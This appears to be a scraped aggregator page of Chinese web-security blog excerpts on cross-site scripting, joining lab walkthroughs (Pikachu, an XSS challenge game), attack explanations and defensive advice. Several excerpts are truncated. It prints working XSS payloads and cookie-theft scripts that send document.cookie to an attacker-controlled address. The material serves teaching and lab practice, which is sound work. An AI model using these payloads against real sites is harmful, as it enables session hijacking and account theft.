xss

Web安全

橙三吉。 提交于 2020-04-04 06:55:19
Web中常见的攻击方式:   XSS跨站脚本攻击   DDoS分布式拒绝服务攻击   Server limit DoS HTTP头超长导致无法访问 攻击类型:   反射型:发出请求时,XSS代码出现在URL中,做为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码,这个过程像一次反射,故叫做反射型。   存储型:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库、内存、文件系统等),下次请求页面时不用再提交XSS代码。 防御措施:   编码:对用户输入的数据进行html实体转义   过滤:移除用户上传的DOM属性,如onerror等,移除用户上传的style节点、script节点、iframe节点等能引入其他页面资源的标签等   校验:避免直接对html转义符实体解码,使用DOM parse转换,校正不配对的DOM标签 来源: https://www.cnblogs.com/jyuf/p/6724476.html

pikachu注入练习(XSS-2)

我与影子孤独终老i 提交于 2020-04-04 00:24:50
1.cookie获取(xss反射型get提交) 我们上次在xss反射型get提交中,通过在输入框内编写js代码<script>alert(‘xss’)</script>显示出了弹窗,我们可以利用这个漏洞,编写高级一些的js代码来获取cookie值 在pikachu中,为我们提供了一个平台,在pikachu文件夹下有一个pkxss文件夹,这个我们可以用来当做获取cookie值的服务器。 我们在pikachu主界面中左侧最下面可以登陆这个后台,第一次登陆需要安装,按要求安装即可 登陆后我们可以看到里面有cookie搜集,点进去就是存放cookie的界面了 然后我们进入到如图所示目录下,修改里面的cookie.php文件,把里面重定向的地址随意的改为其他正常的可访问的地址(欺骗),我这里改为存在漏洞的主页。 接下里我们像之前一样将输入框的输入字符长度加长,然后输入<script>document.location = ' http://192.168.42.140/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> 这段js代码意思是,获取当前网页的cookie值并将其返回我们攻击者的服务器上,(我这里122为被攻击 140为攻击方) 提交以后我们发现似乎并没有什么异常

XSS小游戏通关笔记

一笑奈何 提交于 2020-03-30 23:52:43
0x00 前言 从基础开始学习XSS 根据XSS漏洞出现的位置,我们可以分为以下几类: 1:HTML标签之间的XSS 2:属性中的XSS 3:选择列表中的XSS 4:HTML事件中的XSS 5:javascript伪协议触发的XSS LEVEL1 没有过滤任何 最简单的: http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script> http://127.0.0.1/xss/level1.php?name=<svg/οnlοad=alert(1)> http://127.0.0.1/xss/level1.php?name=<img src=1 οnerrοr=alert(1)> http://127.0.0.1/xss/level1.php?name=<a href="javascript:alert(1)">test</a> http://127.0.0.1/xss/level1.php?name=<p οnclick='alert(1)'>test</p> #点击触发事件 http://127.0.0.1/xss/level1.php?name=<p οnmοuseοver='alert(1)'>test</p> #移动鼠标触发事件 LEVEL2 测试发现进行了实体编码,过滤了<> 对value进行闭合: "

常规web***测试漏洞描述及修复建议

别来无恙 提交于 2020-03-30 21:06:39
Apache样例文件泄漏 测试方法   在链接的根目录中添加examples或者docs目录进行访问判断! 漏洞描述  apache一些样例文件没有删除,可能存在cookie、session伪造,进行后台登录操作 修复建议  1、删除样例文件  2、对apache中web.xml进行相关设置 弱口令 测试方法   先手工尝试一些最基本的弱口令,如admin/admin、admin/123456、admin/888888等,如果不行,使用暴力破解工具进行暴力破解,如使用burpsuite,另外推荐一个小技巧,使用暴力破解的时候,弱口令使用2到3个常见的,然后用户名使用人名拼音top500! 漏洞描述   由于系统中存在有弱口令,导致***者通过弱口令可轻松登录系统中,从而进行下一步的***,如上传webshell,获取敏感数据!   另外***者利用弱口令登录网站管理后台,可任意增删改等操作,从而造成负面影响! 修复建议   1、 建议强制用户首次登录时修改默认口令,或是使用用户自定义初始密码的策略;   2、 完善密码策略,信息安全最佳实践的密码策略为8位(包括)以上字符,包含数字、大小写字母、特殊字符中的至少3种。   3、对管理后台进行访问控制,修改后台弱口令,加强口令强度并定期修改。   4、增加验证机制,防爆破机制,限制ip+cookie访问次数。 明文传输登录口令

web安全-xss.md

给你一囗甜甜゛ 提交于 2020-03-30 08:06:12
web安全-xss xss的定义 xss的原理 xss的攻击方式 脚本的注入,dom的攻击 xss的攻击方式有两种方式 1.反射型 发出请求时,xss代码出现在url中,作为输入提交到服务器端,服务器端解析响应,xss代码随响应内容一起传回浏览器,最后浏览器解析xss. 简单例子: 在node.js 中用express 来作为整个应用的服务架构,-e 表示应用ejs来调用模板引擎,./ 表示当前目录 express -e ./ 例:在url中 http://localhost:3000/?xss=<img src="null" onerror="alert(1)" /> 或者是: http://localhost:3000/?xss= <p onclick=%22alert('点我')>点我 或者是; http://localhost:300/?xss= 实现将网址植入各种广告 <%- %> 前面是减号的就是不需要对内容进行转义,<%= %> 前面是减号的就是不需要对内容进行转义, 2.存储型 存储型与放射型的差别仅在于:提交的代码会存储在服务端(数据库,内存,文件系统等),下次请求目标页面时不用再提交xss代码 问题:存储型的攻击代码是怎么进入存储到服务端的呢? xss的防御措施 编码 对用户输入的数据进行html Entity编码 过滤 移除用户上传的DOM属性

黑客通常在用这 4 种方式攻击你!(内附防御策略)

假如想象 提交于 2020-03-26 06:45:12
黑客通常在用这 4 种方式攻击你!(内附防御策略) XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户浏览器的信任。https://www.cnblogs.com/chengxy-nds/p/12217990.html 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式: <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> 另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态,那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。 危害 窃取用户的 Cookie 伪造虚假的输入表单骗取个人信息 显示伪造的文章或者图片 防范手段 1. 设置 Cookie 为 HttpOnly 设置了 HttpOnly 的

Pikachu:XSS-盲打、过滤、htmlspecialchars、href与js输出

a 夏天 提交于 2020-03-25 10:19:46
XSS盲打:   前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待。我们先进入盲打的页面:   然后在上面的文本框植入script标签,你的大名的地方随便写就可以:   <script>alert('xss')</script> / 123   然后发现并没有弹窗,没有特别的事情发生:   打开右上角的“点一下提示”,里面的内容提示我们登录后台看看,我们就登陆一下:   http://192.168.1.4/pikachu-master/vul/xss/xssblind/admin_login.php   admin/123456   发现点击Login,马上就出现了弹窗:   然后点确定,我们发现后台已经存储了数据:   这种就是也是存储型的,将前端的数据存储到后台,后台如果没有进行过滤的话会使攻击者嵌入恶意代码进行登录获取到后台的信息。这种漏洞属于随机性质的,刚好后台没有做处理,攻击者就可以采取这种方式进行 暗箱操作。 XSS过滤:   如果学习过Sqli-labs或者DVWA,那么对这种注入方式的绕过应该有所了解了,没有学习过请自行查阅相关资料或者参考我前面的博客。后端的代码会在文本框输入的部分进行限制,避免攻击者通过js标签语句来入侵

CRLF注入原理

余生长醉 提交于 2020-03-24 18:21:35
CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。 在HTTP当中HTTP的Header和Body之间就是用两个crlf进行分隔的,如果能控制HTTP消息头中的字符,注入一些恶意的换行,这样就能注入一些会话cookie和html代码,所以CRLF injection 又叫做 HTTP response Splitting,简称HRS。CRLF漏洞可以造成 Cookie会话固定 和 反射型XSS(可过waf) 的危害,注入XSS的利用方式:连续使用两次%0d%oa就会造成header和body之间的分离,就可以在其中插入xss代码形成反射型xss漏洞。 测试 CRLF注入漏洞的检测也和XSS漏洞的检测差不多。通过修改HTTP参数或URL,注入恶意的CRLF,查看构造的恶意数据是否在响应头中输出。主要是在看到有重定向或者跳转的地方,可以在跳转的地址添加 ?url=http://baidu.com/xxx%0a%0dSet-Cookie: test123=123 测试一下,通过查看响应包的数据查看结果。 GET /index.php?c=rpzy&a=query&type=all&value=123

Web安全——跨站脚本攻击(XSS)

拥有回忆 提交于 2020-03-23 17:22:22
web常见攻击手段 我只会大概提及它的攻击原理和预防方法,具体的实现和深入研究还请大家自行百度,因为只有真正需要用到才会去详细了解,这里我只为web安全小白做知识扫盲。因为博主目前接触最多的服务端语言是JAVA所以例子都从java web项目来讲。 跨站脚本攻击(XSS) 虽然我们目前做的是一个博客的小网站,但是以后无论是自己的博客还是实际的项目,都可以用图片来提供外链,方便管理,如果你的网站访问量很高啊,一天几十万几百万啊,我的天啊,这时候你考虑的就不是服务器空间够不够大,而是惊人的并发数啊,光是请求html文件(或其他)的链接就处理不过来了,哪还有多余的资源去读取图片啊,索性就把图片存另一个服务器吧,给主服务器减轻压力啊,于是图床诞生了。 反射型XSS 它是通过诱使用户打开一个恶意链接,服务端将链接中参数的恶意代码渲染到页面中,再传递给用户由浏览器执行,从而达到攻击的目的。如下面的链接: http://a.com/a.jsp?name=xss<script>alert(1)</script> a.jsp将页面渲染成下面的html: Hello xss<script>alert(1)</script> 这时浏览器将会弹出提示框。 持久型XSS 持久型XSS将恶意代码提交给服务器,并且存储在服务器端,当用户访问相关内容时再渲染到页面中,以达到攻击的目的,它的危害更大。 比如